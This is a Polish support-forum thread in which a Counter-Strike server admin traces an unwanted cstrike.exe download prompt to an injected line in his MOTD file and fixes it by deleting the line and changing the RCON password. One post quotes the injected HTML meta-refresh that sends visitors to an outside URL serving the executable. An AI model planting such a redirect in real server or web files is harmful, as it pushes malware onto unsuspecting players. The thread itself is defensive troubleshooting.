←  Problemy

AMXX.pl: Support AMX Mod X i SourceMod

»

[ROZWIĄZANE] cstrike.exe

Locked

  • +
  • -
`mSk.'s Photo `mSk. 12.08.2012

Witam, przepraszam jeżeli piszę w złym dziale. Od kilku dni osobom, które wchodzą na server wyskakuje wirus cstrike.exe Słyszałem o tym, martwi mnie to, że wyskakuje to tylko na tym serverze, na innym mi to chyba nigdy nie wyskoczyło. Bardzo proszę o pomoc jak go usunąć i z góry dziękuję.
Edited by `mSk., 12.08.2012 14:14.
Quote

  • +
  • -
`mSk.'s Photo `mSk. 12.08.2012

Dzięki i sory, nawet nie wziąłem się za szukanie tylko od razu temat napisałem, jakoś tak nie pomyślałem. Zobaczę co z tym będzie i dam Ci znać, ale + już masz ; ) I sory, nie wirus tylko wyskakuje informacja z zapisem pliku cstrike.exe
Edited by `mSk., 12.08.2012 14:54.
Quote

  • +
  • -
`mSk.'s Photo `mSk. 12.08.2012

Nie mogę edytować, więc piszę nowy post. Usunąłem motd.txt, gdzie znajdowało się to:
<META HTTP-EQUIV=Refresh CONTENT="0 URL=http://free-leaks.com/cstrike.exe">

i już tego nie ma, mam pytanie, nie dawno wyskakiwał też jednej osobie inny wirus i też było coś związane to z motd.txt Muszę zrobić to, co jest napisane w temacie, do którego osoba wyżej podała linka? Jeżeli zrobię to, co jest napisane w tym temacie, to czy ten problem będzie się powtarzał?
Edited by `mSk., 12.08.2012 17:33.
Quote

  • +
  • -
Na 5tyk's Photo Na 5tyk 12.08.2012

Zmień hasło rcon i usuń tą linijkę z motd.txt
Quote

  • +
  • -
`mSk.'s Photo `mSk. 12.08.2012

Jako, że nie miałem w ogóle MOTD, bo je usunąłem, dlatego, że tej osobie przez to MOTD wyskakiwał wirus wgrałem sobie te, które miałem. Zmieniłem hasło RCON. Okno z informacją o pobraniu pliku cstrike.exe już nie wyskakuje, ale zobaczę jeszcze czy tej osobie ten wirus będzie wyskakiwał (nie okno z informacją o pobraniu pliku cstrike.exe). Dzięki.
Edited by `mSk., 12.08.2012 18:15.
Quote

  • +
  • -
`mSk.'s Photo `mSk. 19.08.2012

Problem załatwiony, dzięki.
Quote

  • +
  • -
Kawon's Photo Kawon 20.08.2012

Wiadomość wygenerowana automatycznie


Ten temat został zamknięty przez moderatora.

Powód: Pomoc udzielona

Jeśli się z tym nie zgadzasz, Posted Image raportuj ten post, a moderator lub administrator rozpatrzy go ponownie.


Z pozdrowieniami,
Zespół AMXX.PL
Quote
Locked